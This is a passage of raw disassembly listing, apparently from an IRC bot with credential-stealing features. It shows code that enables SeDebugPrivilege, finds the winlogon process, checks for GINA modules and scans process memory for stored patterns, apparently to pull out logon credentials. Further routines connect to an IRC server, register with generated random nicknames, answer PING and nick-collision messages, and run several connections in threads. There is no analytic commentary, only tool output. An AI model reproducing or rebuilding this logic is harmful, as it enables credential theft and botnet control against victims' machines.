; ---------------------------------------------------------------------------
loc_417060: ; CODE XREF: sub_416F1B+101�j
push offset unk_438088
jmp short loc_41706C
; ---------------------------------------------------------------------------
loc_417067: ; CODE XREF: sub_416F1B+B6�j
push offset unk_43805C
loc_41706C: ; CODE XREF: sub_416F1B+143�j
; sub_416F1B+14A�j
lea eax, [ebp+var_29C]
push eax
call sub_41B886
pop ecx
pop ecx
loc_41707A: ; CODE XREF: sub_416F1B+12A�j
push 0
push offset aSedebugprivile ; "SeDebugPrivilege"
call sub_419652
pop ecx
pop ecx
push [ebp+var_8]
call dword_427138 ; FreeLibrary
pop ebx
jmp short loc_4170A7
; ---------------------------------------------------------------------------
loc_417094: ; CODE XREF: sub_416F1B+4E�j
push offset unk_438028
loc_417099: ; CODE XREF: sub_416F1B+3A�j
lea eax, [ebp+var_29C]
push eax
call sub_41B886
pop ecx
pop ecx
loc_4170A7: ; CODE XREF: sub_416F1B+177�j
xor esi, esi
cmp [ebp+var_10], esi
jnz short loc_4170CE
push esi
lea eax, [ebp+var_29C]
push [ebp+var_14]
push eax
lea eax, [ebp+var_98]
push eax
push [ebp+var_9C]
call sub_409A73
add esp, 14h
loc_4170CE: ; CODE XREF: sub_416F1B+191�j
lea eax, [ebp+var_29C]
push eax
call sub_4151AD
push [ebp+var_18]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_416F1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4170ED proc near ; CODE XREF: sub_416F1B+AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 18h
and [esp+18h+var_4], 0
and [esp+18h+var_14], 0
push ebx
push ebp
push esi
mov esi, dword_427148
mov ebx, 100h
push edi
push ebx
push 8
call esi ; GetProcessHeap
mov edi, dword_427144
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
lea eax, [esp+28h+var_14]
push eax
push ebx
push ebp
push 10h
call ds:dword_4D44CC
push ebp
push 0
call esi ; GetProcessHeap
push eax
call dword_427140 ; RtlFreeHeap
push [esp+28h+var_14]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov ebp, eax
mov eax, [esp+28h+var_14]
lea ecx, [esp+28h+var_C]
mov [esp+28h+var_C], eax
push ecx
push eax
push ebp
push 10h
call ds:dword_4D44CC
test eax, eax
jnz short loc_4171DA
mov eax, [esp+28h+var_C]
shr eax, 4
mov [esp+28h+var_10], eax
jz short loc_4171DA
push 1
mov ebx, ebp
pop ecx
cmp eax, ecx
mov [esp+28h+var_18], ecx
jb short loc_4171DA
loc_417176: ; CODE XREF: sub_4170ED+EB�j
cmp word ptr [ebx+8], 5
jnz short loc_4171CD
push 0
push 0
call ds:dword_4D44C0
mov edi, eax
push edi
push 1
push dword ptr [ebx+4]
call ds:dword_4D46D0
test eax, eax
jnz short loc_4171BE
mov eax, [edi+60h]
push offset aWinlogon ; "WINLOGON"
mov [esp+2Ch+var_8], eax
lea eax, [edi+80h]
push eax
call sub_41D5AA
pop ecx
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4171F2
loc_4171BE: ; CODE XREF: sub_4170ED+AA�j
test edi, edi
jz short loc_4171C9
push edi
call ds:dword_4D44C8
loc_4171C9: ; CODE XREF: sub_4170ED+D3�j
mov eax, [esp+28h+var_10]
loc_4171CD: ; CODE XREF: sub_4170ED+8E�j
add ebx, 10h
inc [esp+28h+var_18]
cmp [esp+28h+var_18], eax
jbe short loc_417176
loc_4171DA: ; CODE XREF: sub_4170ED+6D�j
; sub_4170ED+7A�j ...
xor edi, edi
loc_4171DC: ; CODE XREF: sub_4170ED+17D�j
push ebp
push 0
call esi ; GetProcessHeap
push eax
call dword_427140 ; RtlFreeHeap
mov eax, edi
loc_4171EA: ; CODE XREF: sub_4170ED+184�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 18h
retn
; ---------------------------------------------------------------------------
loc_4171F2: ; CODE XREF: sub_4170ED+CF�j
and [esp+28h+var_10], 0
cmp [esp+28h+var_8], 0
jbe short loc_41725B
lea eax, [edi+80h]
mov [esp+28h+var_18], eax
loc_417208: ; CODE XREF: sub_4170ED+16C�j
add [esp+28h+var_18], 11Ch
push offset aNwgina ; "NWGINA"
push [esp+2Ch+var_18]
call sub_41D5AA
pop ecx
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_41726F
push offset aMsgina ; "MSGINA"
push [esp+2Ch+var_18]
call sub_41D5AA
pop ecx
push eax
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_41724D
mov eax, [ebx+4]
mov [esp+28h+var_4], eax
loc_41724D: ; CODE XREF: sub_4170ED+157�j
inc [esp+28h+var_10]
mov eax, [esp+28h+var_10]
cmp eax, [esp+28h+var_8]
jb short loc_417208
loc_41725B: ; CODE XREF: sub_4170ED+10F�j
test edi, edi
jz short loc_417266
push edi
call ds:dword_4D44C8
loc_417266: ; CODE XREF: sub_4170ED+170�j
mov edi, [esp+28h+var_4]
jmp loc_4171DC
; ---------------------------------------------------------------------------
loc_41726F: ; CODE XREF: sub_4170ED+13C�j
xor eax, eax
jmp loc_4171EA
sub_4170ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417276 proc near ; CODE XREF: sub_416F1B+F1�p
var_64 = byte ptr -64h
var_60 = dword ptr -60h
var_40 = byte ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2B = byte ptr -2Bh
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push esi
xor esi, esi
push [ebp+arg_0]
mov [ebp+var_10], esi
push esi
push 410h
call dword_427084 ; OpenProcess
cmp eax, esi
mov [ebp+var_4], eax
jnz short loc_41729F
xor eax, eax
jmp loc_41741A
; ---------------------------------------------------------------------------
loc_41729F: ; CODE XREF: sub_417276+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call dword_427154 ; GetSystemInfo
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, dword_427148
push 8
call esi ; GetProcessHeap
mov edi, dword_427144
push eax
call edi ; RtlAllocateHeap
lea ecx, [ebp+var_8]
mov ebx, dword_427150
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_4172EF
xor esi, esi
jmp loc_41740D
; ---------------------------------------------------------------------------
loc_4172EF: ; CODE XREF: sub_417276+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call dword_42714C ; VirtualQueryEx
test eax, eax
jz loc_4173FC
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_4173FC
test [ebp+var_2B], 1
jnz loc_4173FC
push [ebp+var_34]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_4173FC
loc_417352: ; CODE XREF: sub_417276+112�j
push edi
push offset dword_4D34C0
call sub_426762
pop ecx
test eax, eax
pop ecx
jnz short loc_41737A
lea eax, [edi+200h]
push eax
push offset dword_4D3CC0
call sub_426762
pop ecx
test eax, eax
pop ecx
jz short loc_41738A
loc_41737A: ; CODE XREF: sub_417276+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_4173FC
jmp short loc_417352
; ---------------------------------------------------------------------------
loc_41738A: ; CODE XREF: sub_417276+102�j
test edi, edi
jz short loc_4173FC
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call dword_427114 ; FileTimeToLocalFileTime
test eax, eax
jz short loc_4173C5
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call dword_427110 ; FileTimeToSystemTime
test eax, eax
jz short loc_4173C5
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_4173C5: ; CODE XREF: sub_417276+12B�j
; sub_417276+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov ds:dword_4D46E4, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov ds:dword_4D46DC, eax
mov ds:dword_4D46E0, edi
loc_4173FC: ; CODE XREF: sub_417276+90�j
; sub_417276+A2�j ...
push [ebp+arg_0]
push 0
call esi ; GetProcessHeap
push eax
call dword_427140 ; RtlFreeHeap
mov esi, [ebp+var_10]
loc_41740D: ; CODE XREF: sub_417276+74�j
push [ebp+var_4]
call dword_427068 ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_41741A: ; CODE XREF: sub_417276+24�j
pop esi
leave
retn
sub_417276 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41741D proc near ; CODE XREF: sub_416F1B:loc_417013�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call dword_427084 ; OpenProcess
test eax, eax
mov [ebp+arg_0], eax
jz loc_41750F
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call dword_427154 ; GetSystemInfo
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_417506
mov edi, dword_427148
loc_417468: ; CODE XREF: sub_41741D+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call dword_42714C ; VirtualQueryEx
test eax, eax
jz short loc_4174F4
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_4174FA
test [ebp+var_13], 1
jnz short loc_4174FA
push ecx
push 8
call edi ; GetProcessHeap
push eax
call dword_427144 ; RtlAllocateHeap
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call dword_427150 ; ReadProcessMemory
test eax, eax
jz short loc_4174E6
push offset dword_4D34C0
push esi
call sub_426762
pop ecx
test eax, eax
pop ecx
jnz short loc_4174E6
lea eax, [esi+400h]
push offset dword_4D3CC0
push eax
call sub_426762
pop ecx
test eax, eax
pop ecx
jz short loc_417516
loc_4174E6: ; CODE XREF: sub_41741D+9F�j
; sub_41741D+B0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call dword_427140 ; RtlFreeHeap
jmp short loc_4174FA
; ---------------------------------------------------------------------------
loc_4174F4: ; CODE XREF: sub_41741D+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_4174FA: ; CODE XREF: sub_41741D+71�j
; sub_41741D+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_417468
loc_417506: ; CODE XREF: sub_41741D+3F�j
push [ebp+arg_0]
call dword_427068 ; CloseHandle
loc_41750F: ; CODE XREF: sub_41741D+1E�j
xor eax, eax
loc_417511: ; CODE XREF: sub_41741D+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_417516: ; CODE XREF: sub_41741D+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov ds:dword_4D46DC, ebx
mov ds:dword_4D46E0, eax
cmp [eax], cl
jnz short loc_417538
cmp [eax+1], cl
jz short loc_417540
loc_417538: ; CODE XREF: sub_41741D+114�j
; sub_41741D+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_417538
loc_417540: ; CODE XREF: sub_41741D+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call dword_427068 ; CloseHandle
push 1
pop eax
jmp short loc_417511
sub_41741D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417553 proc near ; CODE XREF: sub_416F1B+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_4D46D8
push esi
mov esi, dword_427148
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi ; GetProcessHeap
push eax
call dword_427144 ; RtlAllocateHeap
mov ecx, ds:dword_4D46D8
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push ds:dword_4D46E0
push eax
call sub_41C310
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr ds:dword_4D46E4
push eax
call ds:dword_4D44C4
push [ebp+var_4]
mov edi, offset dword_4D44D0
push offset dword_4D34C0
push offset dword_4D3CC0
push [ebp+arg_0]
push offset dword_438244
push 200h
push edi
call sub_41B980
add esp, 1Ch
push [ebp+var_4]
push 0
call esi ; GetProcessHeap
push eax
call dword_427140 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
sub_417553 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4175EA proc near ; CODE XREF: sub_416F1B:loc_417057�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_4D46D8
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call dword_427148 ; GetProcessHeap
push eax
call dword_427144 ; RtlAllocateHeap
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_4D3CC0
mov edi, 200h
mov esi, offset dword_4D32C0
loc_417630: ; CODE XREF: sub_4175EA+FA�j
mov eax, ds:dword_4D46D8
add eax, eax
push eax
push ds:dword_4D46E0
push [ebp+var_14]
call sub_41C310
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call ds:dword_4D44C4
mov eax, ds:dword_4D46D8
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_4176A5
loc_41766D: ; CODE XREF: sub_4175EA+B3�j
cmp [ebp+var_8], 0
jz short loc_4176C2
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_417691
cmp byte ptr [ecx+1], 0
jnz short loc_417691
cmp dl, 20h
jnb short loc_41768B
and [ebp+var_8], 0
loc_41768B: ; CODE XREF: sub_4175EA+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_417695
loc_417691: ; CODE XREF: sub_4175EA+90�j
; sub_4175EA+96�j
and [ebp+var_8], 0
loc_417695: ; CODE XREF: sub_4175EA+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_41766D
cmp [ebp+var_8], 0
jz short loc_4176C2
loc_4176A5: ; CODE XREF: sub_4175EA+81�j
push [ebp+var_14]
push offset dword_4D34C0
push ebx
push [ebp+arg_0]
push offset dword_438244
push edi
push esi
call sub_41B980
add esp, 1Ch
jmp short loc_4176DA
; ---------------------------------------------------------------------------
loc_4176C2: ; CODE XREF: sub_4175EA+87�j
; sub_4175EA+B9�j
push offset dword_4D34C0
push ebx
push [ebp+arg_0]
push offset dword_438294
push edi
push esi
call sub_41B980
add esp, 18h
loc_4176DA: ; CODE XREF: sub_4175EA+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_417630
push [ebp+var_14]
push 0
call dword_427148 ; GetProcessHeap
push eax
call dword_427140 ; RtlFreeHeap
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_4175EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417703 proc near ; CODE XREF: sub_4178BB+2F�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_4CB6D4 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_41777F
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_4]
call ds:dword_4CB654 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_4CB694 ; inet_addr
cmp eax, esi
jnz short loc_417764
push [ebp+arg_0]
call ds:dword_4CB6D8 ; gethostbyname
test eax, eax
jz short loc_41777F
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_417764: ; CODE XREF: sub_417703+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_4CB5FC ; connect
cmp eax, esi
jnz short loc_417783
push edi
call ds:dword_4CB6EC ; closesocket
loc_41777F: ; CODE XREF: sub_417703+1B�j
; sub_417703+58�j
mov eax, esi
jmp short loc_417785
; ---------------------------------------------------------------------------
loc_417783: ; CODE XREF: sub_417703+73�j
mov eax, edi
loc_417785: ; CODE XREF: sub_417703+7E�j
pop edi
pop esi
leave
retn
sub_417703 endp
; =============== S U B R O U T I N E =======================================
sub_417789 proc near ; CODE XREF: sub_401ACD+3295�p
; sub_401ACD+3301�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_42A0A4 ; "\n"
push edi
call sub_41BEC0
pop ecx
mov esi, offset dword_4D46EC
pop ecx
loc_4177A1: ; CODE XREF: sub_417789+42�j
cmp dword ptr [esi-4], 1
jnz short loc_4177BF
cmp dword ptr [esi], 0
jbe short loc_4177BF
push 0
push edi
call sub_41AFE0
pop ecx
push eax
push edi
push dword ptr [esi]
call ds:dword_4CB6A4 ; send
loc_4177BF: ; CODE XREF: sub_417789+1C�j
; sub_417789+21�j
add esi, 210h
cmp esi, offset dword_4DAE0C
jl short loc_4177A1
pop edi
pop esi
retn
sub_417789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177D0 proc near ; CODE XREF: sub_4178BB+155�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
mov esi, offset asc_42D128 ; " "
push edi
push esi
push [ebp+arg_0]
call sub_41C0F4
pop ecx
mov [ebp+var_20], eax
pop ecx
lea edi, [ebp+var_1C]
push 7
pop ebx
loc_4177F5: ; CODE XREF: sub_4177D0+35�j
push esi
push 0
call sub_41C0F4
mov [edi], eax
pop ecx
add edi, 4
dec ebx
pop ecx
jnz short loc_4177F5
mov esi, [ebp+var_1C]
xor edi, edi
cmp [ebp+var_20], edi
jnz short loc_41781D
cmp esi, edi
jnz short loc_41781D
push 1
pop eax
jmp loc_4178B6
; ---------------------------------------------------------------------------
loc_41781D: ; CODE XREF: sub_4177D0+3F�j
; sub_4177D0+43�j
push [ebp+var_20]
push offset aPing ; "PING"
call sub_41C070
pop ecx
pop ecx
test eax, eax
push esi
jnz short loc_417838
push offset dword_438EA4
jmp short loc_417886
; ---------------------------------------------------------------------------
loc_417838: ; CODE XREF: sub_4177D0+5F�j
push offset a433 ; "433"
call sub_41C070
pop ecx
test eax, eax
pop ecx
jz short loc_417859
push esi
push offset dword_438EA0
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_4178B4
loc_417859: ; CODE XREF: sub_4177D0+76�j
push 200h
lea eax, [ebp+var_420]
push edi
push eax
call sub_41B590
lea eax, [ebp+var_420]
push eax
call sub_417ADE
add esp, 10h
lea eax, [ebp+var_420]
push eax
push offset dword_438E94
loc_417886: ; CODE XREF: sub_4177D0+66�j
lea eax, [ebp+var_220]
push eax
call sub_41B886
add esp, 0Ch
lea eax, [ebp+var_220]
push edi
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call ds:dword_4CB6A4 ; send
loc_4178B4: ; CODE XREF: sub_4177D0+87�j
xor eax, eax
loc_4178B6: ; CODE XREF: sub_4177D0+48�j
pop edi
pop esi
pop ebx
leave
retn
sub_4177D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4178BB proc near ; DATA XREF: sub_417A60+61�o
var_4008 = byte ptr -4008h
var_3008 = byte ptr -3008h
var_2008 = byte ptr -2008h
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 4008h
call sub_41BB20
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
imul esi, 210h
push 1
pop edi
lea eax, dword_4D46F4[esi]
mov ds:dword_4D46E8[esi], edi
push ds:dword_4D48F4[esi]
push eax
call sub_417703
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov ds:dword_4D46EC[esi], eax
jb loc_417A40
mov edi, 1000h
lea eax, [ebp+var_2008]
push edi
push ebx
push eax
call sub_41B590
lea eax, [ebp+var_2008]
push eax
call sub_417ADE
lea eax, [ebp+var_4008]
push eax
call sub_417ADE
lea eax, [ebp+var_3008]
push eax
call sub_417ADE
add esp, 18h
lea eax, [ebp+var_3008]
push eax
lea eax, [ebp+var_4008]
push eax
lea eax, [ebp+var_2008]
push eax
lea eax, [ebp+var_1008]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax
call sub_41B886
add esp, 14h
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push ds:dword_4D46EC[esi]
call ds:dword_4CB6A4 ; send
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41B590
add esp, 0Ch
loc_417997: ; CODE XREF: sub_4178BB+111�j
; sub_4178BB+180�j
push edi
lea eax, [ebp+var_1008]
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_1008]
push ebx
push edi
push eax
push ds:dword_4D46EC[esi]
call ds:dword_4CB66C ; recv
cmp eax, ebx
mov [ebp+var_8], eax
jle short loc_417A40
xor eax, eax
cmp [ebp+var_8], ebx
mov [ebp+var_4], eax
jz short loc_417997
loc_4179CE: ; CODE XREF: sub_4178BB+17E�j
mov al, [ebp+eax+var_1008]
cmp al, 0Dh
jz short loc_4179F5
cmp al, 0Ah
jz short loc_4179F5
cmp [ebp+arg_0], 0FA0h
jz short loc_4179F5
mov ecx, [ebp+arg_0]
inc [ebp+arg_0]
mov [ebp+ecx+var_2008], al
jmp short loc_417A2F
; ---------------------------------------------------------------------------
loc_4179F5: ; CODE XREF: sub_4178BB+11C�j
; sub_4178BB+120�j ...
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_417A2F
push ds:dword_4D46EC[esi]
mov [ebp+eax+var_2008], bl
lea eax, [ebp+var_2008]
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
ja short loc_417A40
push edi
lea eax, [ebp+var_2008]
push ebx
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+arg_0], ebx
loc_417A2F: ; CODE XREF: sub_4178BB+138�j
; sub_4178BB+13F�j
mov eax, [ebp+var_4]
inc eax
cmp eax, [ebp+var_8]
mov [ebp+var_4], eax
jnz short loc_4179CE
jmp loc_417997
; ---------------------------------------------------------------------------
loc_417A40: ; CODE XREF: sub_4178BB+40�j
; sub_4178BB+107�j ...
mov ds:dword_4D46E8[esi], ebx
mov esi, ds:dword_4D46EC[esi]
cmp esi, ebx
jbe short loc_417A57
push esi
call ds:dword_4CB6EC ; closesocket
loc_417A57: ; CODE XREF: sub_4178BB+193�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_4178BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417A60 proc near ; CODE XREF: sub_401ACD+31E2�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
mov [ebp+var_4], ebx
jle short loc_417AD9
loc_417A72: ; CODE XREF: sub_417A60+77�j
xor edi, edi
mov eax, offset dword_4D46E8
loc_417A79: ; CODE XREF: sub_417A60+28�j
cmp [eax], ebx
jz short loc_417A8A
add eax, 210h
inc edi
cmp eax, offset dword_4DAE08
jl short loc_417A79
loc_417A8A: ; CODE XREF: sub_417A60+1B�j
cmp edi, 31h
jz short loc_417AD9
mov esi, edi
push [ebp+arg_0]
imul esi, 210h
lea eax, dword_4D46F4[esi]
push eax
call sub_41BEB0
mov eax, [ebp+arg_4]
pop ecx
mov ds:dword_4D48F4[esi], eax
pop ecx
lea eax, [ebp+var_8]
mov ds:dword_4D46E8[esi], 1
push eax
push ebx
push edi
push offset sub_4178BB
push ebx
push ebx
call dword_42707C ; CreateThread
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jl short loc_417A72
loc_417AD9: ; CODE XREF: sub_417A60+10�j
; sub_417A60+2D�j
pop edi
pop esi
pop ebx
leave
retn
sub_417A60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417ADE proc near ; CODE XREF: sub_401ACD+374E�p
; sub_401ACD+3794�p ...
var_40 = byte ptr -40h
var_2D = byte ptr -2Dh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_18 = qword ptr -18h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 40h
push 14h
lea eax, [ebp+var_2C]
push 0
push eax
call sub_41B590
add esp, 0Ch
call sub_41B8E2
mov [ebp+var_C], eax
fild [ebp+var_C]
fmul dbl_4276F0
call sub_41C798
cmp eax, 1
jnz short loc_417B28
call sub_41B8E2
call sub_41B8E2
push 66h
cdq
pop ecx
idiv ecx
push off_4385E8[edx*4]
jmp short loc_417B41
; ---------------------------------------------------------------------------
loc_417B28: ; CODE XREF: sub_417ADE+2F�j
call sub_41B8E2
call sub_41B8E2
cdq
mov ecx, 0C0h
idiv ecx
push off_4382E8[edx*4]
loc_417B41: ; CODE XREF: sub_417ADE+48�j
lea eax, [ebp+var_2C]
push eax
call sub_41BEB0
pop ecx
lea eax, [ebp+var_2C]
pop ecx
push ebx
push esi
push edi
push eax
call sub_41AFE0
pop ecx
mov esi, eax
push 13h
mov [ebp+var_4], esi
pop eax
sub eax, esi
mov [ebp+var_C], eax
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276E8
call sub_41C798
mov ebx, eax
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fimul [ebp+var_4]
fmul dbl_4276E0
call sub_41C798
cmp esi, 2
mov edi, offset a__0 ; "-|`_\\{[]}"
jle short loc_417BB4
cmp esi, 3
jnz short loc_417BAB
cmp ebx, 1
jz short loc_417BB4
loc_417BAB: ; CODE XREF: sub_417ADE+C6�j
cmp eax, 1
jnz loc_417C6E
loc_417BB4: ; CODE XREF: sub_417ADE+C1�j
; sub_417ADE+CB�j
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul dbl_4276D8
call sub_41C798
push off_4385E8[eax*4]
lea eax, [ebp+var_40]
push eax
call sub_41BEB0
movsx eax, [ebp+esi+var_2D]
lea ebx, [ebp+esi+var_2C]
push eax
push edi
call sub_41BFB0
add esp, 10h
test eax, eax
jnz short loc_417C5B
movsx eax, [ebp+var_40]
push eax
push edi
call sub_41BFB0
pop ecx
test eax, eax
pop ecx
jnz short loc_417C5B
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
dec esi
fild dword ptr [ebp+var_18+4]
mov dword ptr [ebp+var_18+4], esi
fild dword ptr [ebp+var_18+4]
fmulp st(1), st
fmul dbl_4276E0
call sub_41C798
cmp eax, 1
jnz short loc_417C5B
push edi
call sub_41AFE0
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
pop ecx
fstp qword ptr [ebp-8]
call sub_41B8E2
mov dword ptr [ebp+var_18+4], eax
fild dword ptr [ebp+var_18+4]
fmul qword ptr [ebp-8]
fmul dbl_4276E0
call sub_41C798
